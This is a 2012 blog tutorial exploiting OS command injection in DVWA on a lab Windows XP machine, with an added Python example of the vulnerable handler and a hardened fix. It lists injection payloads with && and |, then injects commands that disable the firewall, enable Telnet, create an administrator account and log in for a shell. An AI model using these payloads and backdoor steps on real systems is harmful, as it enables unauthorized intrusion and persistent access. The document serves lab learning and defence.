Saturday, May 19, 2012

Command Execution Vulnerability Exploitation


Today I will show how to exploit a website through a command execution (OS command injection) vulnerability.

We will do this on DVWA (Damn Vulnerable Web Application).

What is Command Execution ?

OS command injection is a technique used via a web interface in order to execute OS commands on the web server.

The application takes user input from a web form and passes it, unsanitized, into a command line that it hands to the operating system shell. Any web interface that builds shell commands from user input without proper validation is subject to this attack. With the ability to execute OS commands, the attacker can read files, upload malicious programs, add users or even obtain passwords, limited only by the privileges of the account the web server runs as.

*** In the previous article I described how to reach DVWA, installed on the XP machine, from BackTrack.

Practical:

1. Take the XP machine (running DVWA) and the BackTrack machine.

2. In the browser on BackTrack, enter the IP of the XP machine followed by the DVWA path:

http://192.168.25.54/dvwa

DVWA will open; go to Command Execution.

3. The DVWA page asks for an IP address to ping,

so enter 127.0.0.1 (the loopback address, i.e. the web server itself, not your own machine's IP)

It pings, so the form works as intended.

4. Now try to execute the dir command on its own.

boom.......

We get an error. What is the problem?

The form is built to run only ping, with whatever we type appended as the host argument; it does not run an arbitrary command we type in.

How do we bypass this?

The input is concatenated into a command line that is handed to the shell (cmd.exe on this XP box), so we can end ping's argument with a command separator such as && or | (pipe) and append our own command. The shell then runs both.

5. Now try one of these inputs:

127.0.0.1 && dir  (or)

127.0.0.1 | dir   (or)

 | dir

The last one is just the pipe and the command: ping runs with no host argument, prints its usage text, and dir runs anyway because a pipe does not care whether the left-hand command succeeded. With && the second command only runs if ping succeeds (exit code 0), which is why a reachable address such as 127.0.0.1 is put in front of it.


OK, it executed. Now try to find the IP configuration of the remote system. The target is Windows, so the command is ipconfig (ifconfig is the Linux equivalent and only produces a "not recognized" error from cmd.exe):

127.0.0.1 | ipconfig

Now if you want to list the files in the system32 directory:

127.0.0.1 && cd ../../../../../windows/system32 & dir

The single & runs dir regardless of whether cd succeeded, and the relative path climbs out of the web root; once enough ../ have been used you are at the drive root, so the exact depth does not matter.

Now you can read whatever files the account the web server runs as is allowed to read.
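To make the bypass concrete, here is an added example (not DVWA's code and not part of the original post) that reproduces what the low-security handler effectively does, splits the resulting command line the way cmd.exe does at &&, ||, | and & (respecting double quotes and the ^ escape), and shows the hardened version: validate the input as a literal IP address and invoke ping as an argv list with no shell in between. The function names are mine; the payloads are the ones typed into the form above.

```python
import ipaddress
import subprocess
import sys

# What DVWA's "low" handler effectively does (reconstructed for illustration,
# not DVWA's exact source): glue the user's input onto a fixed command and hand
# the whole string to the system shell.
def vulnerable_command_line(target: str) -> str:
    return "ping " + target


# cmd.exe command separators, longest first so "&&" is matched before "&".
SEPARATORS = ("&&", "||", "|", "&")


def split_cmd_exe(cmdline: str) -> list:
    """Split a cmd.exe command line into the separate commands the shell runs.

    Separators inside double quotes do not split, and ^ escapes the next
    character (so ^& is a literal ampersand, not a separator)."""
    commands, buf, i, in_quotes = [], [], 0, False
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '"':
            in_quotes = not in_quotes
            buf.append(ch)
            i += 1
            continue
        if ch == "^" and not in_quotes and i + 1 < len(cmdline):
            buf.append(cmdline[i + 1])
            i += 2
            continue
        if not in_quotes:
            sep = next((s for s in SEPARATORS if cmdline.startswith(s, i)), None)
            if sep:
                commands.append("".join(buf).strip())
                buf = []
                i += len(sep)
                continue
        buf.append(ch)
        i += 1
    commands.append("".join(buf).strip())
    return [c for c in commands if c]


def is_valid_target(target: str) -> bool:
    """Hardened input check: accept only a literal IPv4/IPv6 address.

    Anything containing a separator, a space or a hostname is rejected before
    it gets anywhere near a shell."""
    try:
        ipaddress.ip_address(target.strip())
    except ValueError:
        return False
    return True


def hardened_ping(target: str) -> subprocess.CompletedProcess:
    """Validate first, then run ping WITHOUT a shell.

    With argv-list form the target is exactly one argument; nothing re-parses
    it for && or |, so even a missed validation case cannot inject a command."""
    if not is_valid_target(target):
        raise ValueError("target must be a single IP address")
    count_flag = "-n" if sys.platform.startswith("win") else "-c"
    return subprocess.run(["ping", count_flag, "1", target.strip()],
                          capture_output=True, text=True, timeout=10)


if __name__ == "__main__":
    # The payloads used in the walkthrough, and what the shell actually runs.
    for payload in ("127.0.0.1", "127.0.0.1 && dir", "| dir",
                    "127.0.0.1 && cd ../../../../../windows/system32 & dir"):
        line = vulnerable_command_line(payload)
        print(f"{payload!r:58} -> shell runs {split_cmd_exe(line)}"
              f"  (hardened accepts: {is_valid_target(payload)})")
```

The splitter is the point of the example: it shows that "| dir" still yields two commands (ping with no argument, then dir), while the hardened handler rejects every payload except the bare address and never passes a string to a shell at all.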

What else can we do with Command Execution?

Normally I execute commands like this:

| dir

But after this I want a shell on the remote computer. There are several ways to get one; I am showing one of them.

1. First I disabled the Windows firewall, so that the Telnet port I am about to open is reachable from BackTrack.

To disable the Windows XP firewall:

    netsh firewall set opmode disable

In the command execution field type "| netsh firewall set opmode disable" (without quotes)

To enable the Windows XP firewall again afterwards:

    netsh firewall set opmode enable

Note that this and every following command only succeeds because the web server on the XP box is running with administrative privileges (Apache installed as a service runs as SYSTEM); if it ran as a limited user they would fail with "Access is denied".
   
2. After that I started a service that is useful to me: the Telnet server. It is installed but disabled by default on XP, so it has to be set to start before it can be started:

To enable and start the Telnet service from the command prompt

    sc config tlntsvr start= auto (the space after = is required; hit Enter)

    net start telnet

In the command execution field type "| sc config tlntsvr start= auto" (without quotes), then

    | net start telnet



3. Now I can reach the remote PC with Telnet, but it asks for a login and password,

so I added a user, again from the command prompt only.

To add a new user from the command prompt

    net user /add user1 Ab12345

In the command execution field type "| net user /add user1 Ab12345" (without quotes)



4. The user now exists but does not have the privileges to log in over Telnet (on XP only Administrators and members of the TelnetClients group may), so I added it to the Administrators group for admin privileges:

    net localgroup administrators user1 /add

In the command execution field type "| net localgroup administrators user1 /add" (without quotes)

5. I opened a terminal in BackTrack and connected with Telnet:

    telnet 192.168.x.x

    login: user1
    password: Ab12345





Boooooooooooooooom...............
   
Got a shell on the remote computer

    c:\>


